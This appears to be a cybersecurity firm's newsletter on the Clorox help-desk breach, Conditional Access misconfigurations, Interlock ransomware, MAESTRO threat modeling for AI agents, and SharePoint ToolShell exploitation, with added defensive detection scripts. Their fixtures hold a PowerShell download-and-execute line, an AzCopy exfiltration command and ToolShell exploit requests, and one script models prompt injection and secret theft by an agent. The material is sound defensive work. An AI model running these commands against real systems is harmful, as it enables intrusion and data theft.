Cyber Intelligence Weekly (July 27, 2025): Our Take on Three Things You Need to Know
Welcome to our weekly newsletter where we share some of the major developments on the future of cybersecurity that you need to know about. Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!
To receive these and other curated updates to your inbox on a regular basis, please sign up for our email list here: https://echeloncyber.com/ciw-subscribe
Before we get started on this week’s CIW, I’d like to highlight a great case study with our friends at Montauk Renewables, Inc.!
Partnering with Echelon Risk + Cyber gave Montauk Renewables, Inc. more than just cybersecurity support; it gave them structure, clarity, and control. In just 12 months, they achieved:
🔒 90% reduction in critical vulnerabilities
📈 SEC compliance across complex IT & OT systems
⚙️ A scalable, strategic cybersecurity program built for resilience
This is what happens when managed vCISO services meet deep OT expertise.
📘 Read the full case study to see how this partnership transformed cybersecurity into a business enabler: https://echeloncyber.com/intelligence/entry/montauk-renewable-gas-echelon-risk-cyber-vciso-cybersecurity-case-study

Away we go!
1. Clorox Sues Cognizant Over Password Resets That Opened Door to 2023 Hack
Clorox's 2023 cyberattack has splashed into the courtroom. In a newly filed complaint in California, the cleaning-product giant accuses long-time IT outsourcer Cognizant of handing attackers an engraved invitation to its corporate network during the August 2023 breach that hobbled production lines and, by Clorox's estimate, cost $380 million. According to the suit, threat actors phoned the Cognizant-run help desk, claimed to be Clorox staff, and were granted repeated password resets and MFA resets with no manager checks and no identity verification, all captured on call recordings. Clorox says the credentials unlocked Okta, VPN and Microsoft accounts, letting the intruders fan out through internal systems before security teams pulled the plug and reverted to manual order processing.
The disruption rippled for months: factories idled, supermarket shelves emptied, shipment volumes slid six percent, and consultants, forensics teams and system rebuilds racked up another $49 million in remediation spend. Although insurance has since recouped roughly a quarter of the losses, Clorox now wants Cognizant to foot the remaining bill and face punitive damages for “reckless disregard” of well‑documented password‑reset rules that required positive caller ID and manager confirmation.
Cognizant fired back in a statement, calling the lawsuit “shocking” and pinning blame on Clorox’s “inept internal cybersecurity,” insisting its remit was limited to routine help‑desk duties, not enterprise defense. The filing includes partial transcripts of the help‑desk calls: one agent resets both VPN and Okta credentials after the caller admits they’ve forgotten every password; a second agent twice wipes the same MFA device without challenge; yet another changes the SMS number tied to an administrator account. Within three hours, Clorox says, the adversaries had compromised a privileged security engineer and launched network‑wide reconnaissance.
Beyond the corporate finger-pointing, the case is a textbook study in modern social-engineering campaigns: low-tech phone work defeating layers of expensive security tooling. For CISOs, the message is brutal but clear: zero trust starts at the service desk. Mandatory identity vetting before any reset (the positive caller identification and manager confirmation that Clorox's own rules already required), recorded decision logs, and automated alerts whenever a password or MFA factor is reset, especially on a privileged account or on the same account more than once in a shift, are no longer best practice; they are existential safeguards.
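What such an automated alert looks like in practice, as an added example for this newsletter (not code from Clorox, Cognizant or Okta): it replays the three patterns in the filing, a reset on a privileged account, the same account reset repeatedly by different agents, and a password reset followed by an MFA wipe, over constructed identity-provider events. The records are Okta-System-Log-style but the eventType names, the flattened actor/target fields and the privileged-account list are assumptions.

```python
"""Flag help-desk credential-reset patterns that a social-engineering call leaves behind.

Added example; the events below are constructed, Okta-System-Log-style records. The
eventType strings and flattened actor/target fields are an assumption, not a vendor schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical privileged identities: any reset here is a break-glass alert.
PRIVILEGED = {"sec.engineer@example.com"}

RESET_EVENTS = {
    "user.account.reset_password",  # help desk reset the password
    "user.mfa.factor.reset_all",    # all MFA factors wiped
    "user.mfa.factor.deactivate",   # one MFA factor removed
    "user.mfa.factor.activate",     # new factor enrolled (e.g. a new SMS number)
}
MFA_WIPES = {"user.mfa.factor.reset_all", "user.mfa.factor.deactivate"}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"published": "2023-08-11T13:02:10Z", "eventType": "user.account.reset_password",
     "actor": "helpdesk.agent1@example.com", "target": "j.doe@example.com"},
    {"published": "2023-08-11T13:04:45Z", "eventType": "user.mfa.factor.reset_all",
     "actor": "helpdesk.agent1@example.com", "target": "j.doe@example.com"},
    {"published": "2023-08-11T14:10:00Z", "eventType": "user.mfa.factor.reset_all",
     "actor": "helpdesk.agent2@example.com", "target": "j.doe@example.com"},
    {"published": "2023-08-11T15:30:00Z", "eventType": "user.mfa.factor.activate",
     "actor": "helpdesk.agent3@example.com", "target": "sec.engineer@example.com"},
    {"published": "2023-08-11T09:00:00Z", "eventType": "user.account.reset_password",
     "actor": "helpdesk.agent1@example.com", "target": "a.smith@example.com"},
    {"published": "2023-08-11T16:00:00Z", "eventType": "user.session.start",
     "actor": "a.smith@example.com", "target": "a.smith@example.com"},
]


def _ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def detect_reset_abuse(events, privileged=PRIVILEGED, window=timedelta(hours=3), max_resets=2):
    """Return alert dicts for three patterns:
    PRIVILEGED_RESET   any credential/MFA reset on a privileged account
    REPEATED_RESET     max_resets or more reset events on one account inside `window`
    PASSWORD_THEN_MFA  a password reset followed by an MFA wipe inside `window`
                       (the combination that hands an attacker a fully working account)
    """
    history = defaultdict(list)
    for event in events:
        if event["eventType"] in RESET_EVENTS:
            history[event["target"]].append((_ts(event["published"]), event["eventType"], event["actor"]))

    alerts = []
    for target, resets in history.items():
        resets.sort()  # chronological; tuples sort on the timestamp first

        if target in privileged:
            alerts.append({"rule": "PRIVILEGED_RESET", "target": target, "count": len(resets),
                           "actors": sorted({actor for _, _, actor in resets})})

        # Sliding window: the first burst of max_resets or more resets raises one alert.
        for i, (start, _, _) in enumerate(resets):
            burst = [r for r in resets[i:] if r[0] - start <= window]
            if len(burst) >= max_resets:
                alerts.append({"rule": "REPEATED_RESET", "target": target, "count": len(burst),
                               "actors": sorted({actor for _, _, actor in burst})})
                break

        password_resets = [t for t, kind, _ in resets if kind == "user.account.reset_password"]
        mfa_wipes = [t for t, kind, _ in resets if kind in MFA_WIPES]
        if any(timedelta(0) <= wipe - pw <= window for pw in password_resets for wipe in mfa_wipes):
            alerts.append({"rule": "PASSWORD_THEN_MFA", "target": target,
                           "count": len(password_resets) + len(mfa_wipes),
                           "actors": sorted({actor for _, _, actor in resets})})
    return alerts


if __name__ == "__main__":
    for alert in detect_reset_abuse(SAMPLE_EVENTS):
        print(alert)
```

In the sample, j.doe trips both the repeat and password-then-MFA rules (three resets by two agents inside two hours), the privileged engineer trips the break-glass rule on a single SMS-factor enrolment, and a.smith's lone password reset stays quiet. The point of the PRIVILEGED_RESET rule is that for admin-tier accounts the threshold is one: the alert should page someone, not land in a queue.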

Understanding Risks with Cloud Conditional Access Policies
Cloud conditional access policies (CAPs) are essential for securing cloud environments by enforcing authentication and access control rules based on user identity, device compliance, location, and risk level. While these policies enhance security, they also introduce potential risks that organizations must manage effectively.
Risks Associated with Conditional Access Policies
Misconfiguration and Overly Permissive Rules
If conditional access policies are not configured correctly, they may grant unintended access to unauthorized users or block legitimate users, disrupting business operations. Common mistakes include leaving a policy in report-only mode and assuming it enforces, excluding whole groups "temporarily" and never revisiting the exclusion, and scoping a policy to some applications while the rest stay reachable without the control. Organizations often struggle to balance security and usability.
User Frustration and Productivity Loss
Stringent access policies, such as frequent multi-factor authentication (MFA) prompts or location-based restrictions, can hinder user productivity. Employees may resort to insecure workarounds, such as using personal devices or weak passwords, to bypass restrictions.
False Positives and Legitimate Access Denials
Conditional access policies rely on factors like IP addresses, device status, and geographic locations. Legitimate users travelling or using VPNs may get locked out, leading to operational delays and increased support requests.
Insider Threats and Bypass Attempts
Conditional access policies can stop unauthorized external access, but an insider with valid credentials and a compliant device satisfies every condition, and an insider holding Conditional Access or Global Administrator rights can add themselves to an exclusion or flip a policy to report-only. Without monitoring of both sign-in logs and policy-change audit logs, such manipulation goes unnoticed.
Integration Challenges with Legacy Systems
Many organizations use a mix of cloud and on-premises solutions. Legacy authentication protocols (for example basic authentication for IMAP, POP and SMTP, or older Exchange ActiveSync clients) carry no device or MFA claims, so a tenant that does not explicitly block legacy authentication leaves a bypass that attackers routinely exploit with password spraying.
Mitigating Risks
- Regularly review and test policies to ensure proper configurations.
- Implement adaptive authentication to reduce user friction while maintaining security.
- Monitor access logs for anomalies and insider threats.
- Ensure legacy systems are updated or integrated securely with modern security solutions.
By carefully managing conditional access policies, organizations can enhance cloud security without compromising usability or operational efficiency. SecureSloth has also released a tool, noCAP, that can help quickly identify misconfigured CAPs that threat actors may abuse.
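A small audit of the misconfigurations listed above, written for this newsletter as an added example (it is not SecureSloth's noCAP and not a Microsoft tool). It runs over policy records in the shape of Microsoft Graph conditionalAccessPolicy objects (displayName, state, conditions, grantControls), which is what an export from the Graph API or Entra portal gives you; the sample policies, the break-glass allowlist and the application ID are constructed.

```python
"""Audit exported Entra ID Conditional Access policies for common misconfigurations.

Added example. Policy records are constructed in the shape of Microsoft Graph
conditionalAccessPolicy objects; only the fields used here are included, and the
break-glass allowlist, policy names and app ID are hypothetical.
"""

# Hypothetical break-glass identities that are legitimately excluded from MFA policies.
BREAK_GLASS = {"breakglass-1@example.com"}

# Graph clientAppTypes values that represent legacy (non-modern) authentication clients.
LEGACY_CLIENTS = {"exchangeActiveSync", "other"}

# Constructed sample export (not a real tenant).
SAMPLE_POLICIES = [
    {"displayName": "Require MFA for all users",
     "state": "enabledForReportingButNotEnforced",
     "conditions": {"users": {"includeUsers": ["All"], "excludeUsers": ["breakglass-1@example.com"],
                              "excludeGroups": ["grp-vpn-service"]},
                    "applications": {"includeApplications": ["All"], "excludeApplications": []},
                    "clientAppTypes": ["all"]},
     "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}},
    {"displayName": "Block legacy authentication",
     "state": "disabled",
     "conditions": {"users": {"includeUsers": ["All"], "excludeUsers": [], "excludeGroups": []},
                    "applications": {"includeApplications": ["All"], "excludeApplications": []},
                    "clientAppTypes": ["exchangeActiveSync", "other"]},
     "grantControls": {"operator": "OR", "builtInControls": ["block"]}},
    {"displayName": "Require compliant device for Office 365",
     "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"], "excludeUsers": [], "excludeGroups": []},
                    "applications": {"includeApplications": ["Office365"],
                                     "excludeApplications": ["00000000-0000-0000-0000-00000000abcd"]},
                    "clientAppTypes": ["all"]},
     "grantControls": {"operator": "OR", "builtInControls": ["compliantDevice"]}},
]


def _controls(policy):
    return set((policy.get("grantControls") or {}).get("builtInControls", []))


def audit_policy(policy, break_glass=BREAK_GLASS):
    """Return finding codes for one policy."""
    findings = []
    users = policy["conditions"]["users"]
    apps = policy["conditions"]["applications"]
    controls = _controls(policy)
    enforced = policy["state"] == "enabled"

    if controls and not enforced:
        findings.append("NOT_ENFORCED")           # report-only or disabled protects nothing
    unexpected = (set(users.get("excludeUsers", [])) - break_glass) | set(users.get("excludeGroups", []))
    if unexpected:
        findings.append("UNREVIEWED_EXCLUSION")   # someone outside break-glass bypasses this policy
    if enforced and apps.get("excludeApplications"):
        findings.append("APP_SCOPE_GAP")          # excluded apps are reachable without the control
    return findings


def blocks_legacy_auth(policy):
    """True if this policy is an enforced, tenant-wide block of legacy-auth clients."""
    cond = policy["conditions"]
    return (policy["state"] == "enabled"
            and _controls(policy) == {"block"}
            and cond["users"].get("includeUsers") == ["All"]
            and LEGACY_CLIENTS <= set(cond.get("clientAppTypes", [])))


def audit_tenant(policies, break_glass=BREAK_GLASS):
    """Map policy display names to findings, plus tenant-wide findings under 'tenant'."""
    report = {p["displayName"]: audit_policy(p, break_glass) for p in policies}
    tenant = []
    if not any(blocks_legacy_auth(p) for p in policies):
        tenant.append("NO_LEGACY_AUTH_BLOCK")     # legacy clients carry no MFA/device claims
    if not any(p["state"] == "enabled" and "mfa" in _controls(p)
               and p["conditions"]["users"].get("includeUsers") == ["All"] for p in policies):
        tenant.append("NO_TENANT_WIDE_MFA")
    report["tenant"] = tenant
    return report


if __name__ == "__main__":
    for name, findings in audit_tenant(SAMPLE_POLICIES).items():
        print(f"{name}: {findings or 'ok'}")
```

Two of the findings are tenant-wide rather than per policy on purpose: a legacy-auth block that exists but is disabled is exactly as useful as one that was never created, so the question to ask the tenant is "is any enforced policy doing this job", not "does a policy with that name exist".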

2. Feds: Filter the Web and Patch Fast—Interlock Ransomware Is on the Move
The FBI, CISA, HHS, and the MS-ISAC have published an urgent #StopRansomware bulletin (alert AA25-203A) warning that the Interlock extortion crew is stepping up its campaigns against businesses and critical-infrastructure organizations in North America and Europe. The joint notice, based on incident-response work as recent as June 2025, confirms that the gang routinely double-extorts its victims, stealing data before encrypting virtual machines on both Windows and Linux hosts, and has begun experimenting with FreeBSD payloads as well. Federal analysts reiterate that Interlock's entry point is often a drive-by download from a compromised legitimate website, disguised as a browser or security-tool update, or a ClickFix-style prompt that tricks users into pasting a Base64-encoded PowerShell command into the Windows Run dialog.
Once a foothold is gained, operators deploy information-stealers such as Lumma Stealer and Berserk Stealer, pivot with tools like AnyDesk, PuTTY and Cobalt Strike, and exfiltrate archives to Azure blob storage via AzCopy before launching the encryptor, which has been observed dropped under the name conhost.exe. Victims receive a terse !README! note plus a Tor URL, with no upfront price tag, pressuring them to pay in Bitcoin or watch their data leak. Code overlaps and shared infrastructure continue to hint at a relationship with the earlier Rhysida operation, but the advisory stresses that Interlock's tactics are evolving quickly, including fresh filename camouflage that poses as FortiClient, GlobalProtect, or Cisco Secure Client installers.
The agencies outline four “do‑it‑today” defenses: deploy DNS and web‑filtering to block rogue downloads; patch OSes and firmware promptly; carve the network into security zones to blunt lateral movement; and enforce identity‑and‑access discipline with MFA across every service. They also urge healthcare providers to lean on newly released sector‑specific Cyber Performance Goals, and remind all organizations that paying the ransom rarely guarantees recovery—and does guarantee more criminal funding.
A full list of indicators (hashes, IPs, attacker toolset) plus STIX packages is bundled with the alert. The FBI asks victims—even those who resist payment—to preserve logs, sample encrypted files, and report incidents via IC3 or their local field office, noting that past submissions have directly enabled decryptor development and wallet tracing.
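Two of the behaviours above leave distinctive process-creation telemetry: the ClickFix paste (an encoded PowerShell one-liner whose parent is explorer.exe, because the Run dialog launched it) and the AzCopy push to a blob.core.windows.net URL. The hunt below is an added example for this newsletter, not code from the advisory; it decodes the -EncodedCommand payload before matching, so an attacker cannot hide the download cradle inside the Base64. The events are constructed, Sysmon Event ID 1-style records with assumed field names, and the 203.0.113.10 host and staging7 storage account are placeholders.

```python
"""Hunt process-creation telemetry for ClickFix-style encoded PowerShell and AzCopy exfiltration.

Added example. Events are constructed, Sysmon Event ID 1-style records (field names assumed);
the URLs and account names in them are placeholders.
"""
import base64
import re

DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|net\.webclient|"
    r"invoke-expression|\biex\b|start-bitstransfer)", re.IGNORECASE)
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
AZURE_BLOB = re.compile(r"https?://[\w.-]+\.blob\.core\.windows\.net", re.IGNORECASE)


def _encode_ps(command):
    """Encode a command the way `powershell -enc` expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if absent or not decodable."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",  # Run dialog => explorer is the parent
     "CommandLine": "powershell.exe -w hidden -enc " + _encode_ps("iwr http://203.0.113.10/update.ps1 | iex"),
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Users\jdoe\Downloads\azcopy.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'azcopy.exe copy "C:\\Shares\\Finance" "https://staging7.blob.core.windows.net/out?sv=2023" --recursive',
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",  # scheduled task, plain script path
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
     "User": r"NT AUTHORITY\SYSTEM"},
]


def classify(event):
    """Return (rule, detail) tuples for one process-creation event."""
    hits = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmd)
        if decoded is not None and DOWNLOAD_CRADLE.search(decoded):
            rule = "CLICKFIX_ENCODED_POWERSHELL" if parent.endswith("explorer.exe") else "ENCODED_DOWNLOAD_CRADLE"
            hits.append((rule, decoded))
    if image.endswith("azcopy.exe"):
        blob = AZURE_BLOB.search(cmd)
        if blob:
            hits.append(("AZCOPY_TO_BLOB", blob.group(0)))
    return hits


def hunt(events):
    """Run classify() over a batch and keep only the events that produced a hit."""
    results = []
    for event in events:
        hits = classify(event)
        if hits:
            results.append((event["User"], hits))
    return results


if __name__ == "__main__":
    for user, hits in hunt(SAMPLE_EVENTS):
        print(user, hits)
```

The third sample, a scheduled-task PowerShell with a plain -File argument, produces nothing, which is the precision you need before turning this into an alert. AzCopy to a storage account you own is legitimate, so in production the AZCOPY_TO_BLOB rule should be narrowed with an allowlist of your own storage account names.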
Threat Modeling Agentic AI using MAESTRO
In today's rapidly evolving AI security landscape, identifying and mitigating potential threats is essential. MAESTRO (Multi-Agent Environment, Security, Threat, Risk, and Outcome) is the Cloud Security Alliance's threat modeling framework for agentic AI. It describes an agent system as a stack of layers (foundation models, data operations, agent frameworks, deployment and infrastructure, evaluation and observability, security and compliance, and the wider agent ecosystem) and asks what can go wrong within each layer and across layer boundaries, including the non-deterministic and autonomous behaviour that classic frameworks such as STRIDE do not capture on their own. The six stages below summarize how to work through it as an iterative process: Model, Analyze, Explore, Strategize, Track, and Optimize. For a detailed overview and instructions on how to use MAESTRO, review the paper from the Cloud Security Alliance (CSA).
1. Model: The first phase focuses on creating a structured representation of the system or application. This includes identifying components, data flows, assets, and potential entry points. Accurate modeling helps establish a clear understanding of the architecture and its attack surfaces.
2. Analyze: In this phase, security experts evaluate the modeled system to identify vulnerabilities and potential threats. This involves applying various techniques, such as attack trees, STRIDE, or kill-chain analysis, to highlight weak points.
3. Explore: The exploration stage encourages teams to think creatively about possible attack vectors. Threat actors’ tactics, techniques, and procedures (TTPs) are considered to simulate real-world scenarios. This step ensures that unconventional or emerging threats are accounted for.
4. Strategize: Once threats are identified, the framework prioritizes them based on their likelihood and potential impact. Organizations develop mitigation strategies, including preventive controls, incident response plans, and compensating measures.
5. Track: Continuous monitoring and tracking of threats is essential. MAESTRO promotes dynamic updates to the threat model as the system evolves, ensuring new risks are consistently identified and addressed.
6. Optimize: Finally, MAESTRO emphasizes the importance of refining the process. By analyzing incidents, feedback, and security improvements, the framework becomes more effective over time.
By following the MAESTRO framework, organizations can create a structured and repeatable approach to threat modeling, improving their overall security posture and resilience against evolving cyber threats.
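To make the Model, Analyze, Strategize and Track stages concrete, here is an added example for this newsletter (not the CSA's reference implementation) that models a small agent as components with trust levels and capabilities plus the data flows between them, derives threats by reachability from untrusted input, ranks them by likelihood times impact, and then re-runs the model after a control change to show which threats the change retired. The component names, capabilities and the 1-5 scores are illustrative.

```python
"""Derive and rank threats from a data-flow model of an agentic system, then track the
effect of a control change. Added example; component names, capability flags and the
1-5 likelihood/impact scores are illustrative, not the CSA's own values.
"""
from dataclasses import dataclass

# Model: a hypothetical agent with one planner LLM, memory, a secrets store and three tools.
COMPONENTS = {
    "web_page":      {"trust": "untrusted"},                       # attacker-controlled content
    "planner_llm":   {"trust": "model"},                           # reasons over everything it reads
    "vector_memory": {"trust": "internal", "llm_writable": True},  # long-term memory the LLM updates
    "secrets_store": {"trust": "internal", "secret": True},        # API keys injected into context
    "send_email":    {"trust": "tool", "side_effect": True, "approval": False},
    "run_shell":     {"trust": "tool", "side_effect": True, "approval": True},
    "http_fetch":    {"trust": "tool", "egress": True},
}
FLOWS = [  # (source, destination) data flows
    ("web_page", "planner_llm"), ("secrets_store", "planner_llm"),
    ("planner_llm", "vector_memory"), ("vector_memory", "planner_llm"),
    ("planner_llm", "send_email"), ("planner_llm", "run_shell"), ("planner_llm", "http_fetch"),
]


@dataclass(frozen=True)
class Threat:
    kind: str
    component: str
    likelihood: int  # 1-5
    impact: int      # 1-5

    @property
    def score(self):
        return self.likelihood * self.impact


def reachable(flows, start):
    """Every component reachable from `start` through one or more flows."""
    seen, frontier = set(), [start]
    while frontier:
        node = frontier.pop()
        for src, dst in flows:
            if src == node and dst not in seen:
                seen.add(dst)
                frontier.append(dst)
    return seen


def analyze(components, flows):
    """Analyze + Strategize: enumerate threats reachable from untrusted input, ranked by score."""
    threats = set()
    untrusted = [c for c, a in components.items() if a["trust"] == "untrusted"]
    for llm in [c for c, a in components.items() if a["trust"] == "model"]:
        if not any(llm in reachable(flows, u) for u in untrusted):
            continue  # no untrusted content reaches this model
        threats.add(Threat("prompt_injection", llm, 4, 3))
        downstream = reachable(flows, llm)
        secrets_in_context = any(llm in reachable(flows, s) for s, a in components.items() if a.get("secret"))
        for c in downstream:
            attrs = components[c]
            if attrs.get("side_effect") and not attrs.get("approval"):
                threats.add(Threat("unapproved_side_effect", c, 3, 5))   # injected text becomes an action
            if attrs.get("llm_writable") and llm in reachable(flows, c):
                threats.add(Threat("memory_poisoning", c, 3, 4))         # injection persists across sessions
            if secrets_in_context and attrs.get("egress"):
                threats.add(Threat("secret_exfiltration", c, 2, 5))      # keys in context + outbound channel
    return sorted(threats, key=lambda t: (-t.score, t.kind, t.component))


def track(before, after):
    """Track: which threats a change removed or introduced between two model runs."""
    return {"resolved": sorted(set(before) - set(after), key=str),
            "new": sorted(set(after) - set(before), key=str)}


if __name__ == "__main__":
    baseline = analyze(COMPONENTS, FLOWS)
    for t in baseline:
        print(f"{t.score:>2}  {t.kind:<24} {t.component}")
    # Strategize: require human approval before send_email, then re-run the model.
    hardened = {**COMPONENTS, "send_email": {**COMPONENTS["send_email"], "approval": True}}
    print(track(baseline, analyze(hardened, FLOWS)))
```

run_shell never appears in the output because it already sits behind an approval gate, which is the Strategize lesson in miniature: the cheapest mitigation for an agent is usually a control on the tool edge, not a better prompt. Re-running the model after every architecture or control change is what the Track stage means in practice, and the diff is what you file against the change ticket.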

3. Microsoft Rushes Out SharePoint Fixes as Typhoon Crews and Storm‑2603 Exploit New RCE
Microsoft's threat-intel teams have confirmed a coordinated exploitation spree against on-prem SharePoint farms, chaining a spoofing flaw (CVE-2025-49706) with a remote-code-execution bug (CVE-2025-49704), and then their patch-bypass twins CVE-2025-53770 (RCE) and CVE-2025-53771 (spoofing), the chain publicly known as ToolShell. The company has rushed out cumulative patches for SharePoint Server 2016, 2019 and Subscription Edition and is urging administrators to install them and restart IIS the same day, then rotate the ASP.NET machine keys: the exploit steals the farm's ValidationKey, which lets an attacker forge signed ViewState payloads and regain code execution on an already patched server until the keys are replaced. SharePoint Online remains unaffected.
Telemetry shows three China-based groups abusing the bugs: long-time espionage crews Linen Typhoon and Violet Typhoon are pillaging vulnerable portals for data, while a newer actor Microsoft tags Storm-2603 is pushing Warlock ransomware after dropping spinstall0.aspx (a script that dumps the server's ASP.NET MachineKey values rather than a classic interactive shell) via a crafted POST to /_layouts/15/ToolPane.aspx carrying a spoofed Referer of /_layouts/SignOut.aspx. Once inside, Storm-2603 disables Defender rules, scrapes LSASS with Mimikatz, moves laterally with PsExec/Impacket, and finally uses Group Policy to fan out its encryptor across the estate.
Because the initial exploit works pre‑auth, Redmond recommends layering defenses beyond patching: enable AMSI in full mode with Defender AV, deploy EDR in block mode, enforce MFA, and segment internet‑facing SharePoint servers behind authenticated proxies where possible. Microsoft has published dozens of hashes, IPs (e.g., 65.38.121[.]198) and DocuSign‑look‑alike domains to block, plus hunting queries for Sentinel and Defender XDR; cloud‑delivered protection will already quarantine the web‑shell and RAT binaries under SuspSignoutReq and HijackSharePointServer detections.
Organizations that cannot patch immediately are advised to take servers offline or restrict them to VPN‑only access, then apply updates, restart IIS, rotate machine keys, and check for signs of compromise (new .aspx files under TEMPLATE\LAYOUTS, unexpected scheduled tasks, IIS back‑door DLLs). Given the speed with which these flaws have entered ransomware playbooks, every unpatched farm left online is now a standing invitation.
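For the "check for signs of compromise" step, the IIS logs are the quickest place to start: the exploit request is a POST to ToolPane.aspx with a Referer of SignOut.aspx and no authenticated user, and the follow-on is a GET for the dropped spinstall*.aspx. The hunt below is an added example for this newsletter, not Microsoft's published Sentinel/Defender queries. The W3C log lines are constructed, and the 203.0.113.77 client and the KNOWN_BAD_IPS placeholder are hypothetical; replace the latter with the indicator list Microsoft and CISA published.

```python
"""Hunt IIS W3C logs on an on-prem SharePoint farm for the ToolShell request pattern and
follow-on web-shell access. Added example; log lines are constructed and KNOWN_BAD_IPS
is a placeholder to be filled from the published indicator list.
"""
import re

TOOLPANE = re.compile(r"^/_layouts/1[56]/toolpane\.aspx$", re.IGNORECASE)
SIGNOUT_REFERER = re.compile(r"/_layouts/(?:1[56]/)?signout\.aspx$", re.IGNORECASE)
SPINSTALL_SHELL = re.compile(r"^/_layouts/1[56]/spinstall\d*\.aspx$", re.IGNORECASE)
KNOWN_BAD_IPS = {"203.0.113.77"}  # placeholder, not a real indicator

# Constructed sample log (IIS writes spaces inside field values as '+', so split() is safe).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-19 08:14:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.77 Mozilla/5.0 https://sp.example.com/_layouts/SignOut.aspx 200 0 0 512
2025-07-19 08:14:07 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.77 Mozilla/5.0 - 200 0 0 31
2025-07-19 08:20:11 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\jdoe 10.0.0.42 Mozilla/5.0 https://sp.example.com/ 200 0 0 88
2025-07-19 08:21:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\\jdoe 10.0.0.42 Mozilla/5.0 https://sp.example.com/sites/hr/_layouts/15/settings.aspx 200 0 0 120
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def classify(record, known_bad=KNOWN_BAD_IPS):
    """Return finding codes for one request."""
    findings = []
    stem, referer = record["cs-uri-stem"], record["cs(Referer)"]
    if (record["cs-method"] == "POST" and TOOLPANE.match(stem)
            and SIGNOUT_REFERER.search(referer)):
        findings.append("TOOLSHELL_EXPLOIT_ATTEMPT")  # ToolPane POST with the spoofed SignOut referer
    if SPINSTALL_SHELL.match(stem):
        findings.append("WEBSHELL_ACCESS")            # spinstall*.aspx dumps the MachineKey
    if record["c-ip"] in known_bad:
        findings.append("KNOWN_BAD_SOURCE")
    return findings


def hunt(text, known_bad=KNOWN_BAD_IPS):
    """Map each client IP that produced findings to the sorted list of finding codes."""
    hits = {}
    for record in parse_w3c(text):
        for code in classify(record, known_bad):
            hits.setdefault(record["c-ip"], set()).add(code)
    return {ip: sorted(codes) for ip, codes in hits.items()}


if __name__ == "__main__":
    for ip, codes in hunt(SAMPLE_LOG).items():
        print(ip, codes)
```

The fourth sample line is an authenticated editor legitimately POSTing to ToolPane.aspx from a settings page; it is not flagged, because the discriminator is the SignOut.aspx Referer, not the endpoint alone. Any IP that trips TOOLSHELL_EXPLOIT_ATTEMPT should be assumed to hold your machine keys, which is why key rotation is part of the remediation even on a patched farm. The same baseline idea applies on disk: diff the contents of TEMPLATE\LAYOUTS against a clean install and treat every unexpected .aspx as a web shell until proven otherwise.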
Thanks for reading!
About us: Echelon is a full-service cybersecurity consultancy that offers holistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about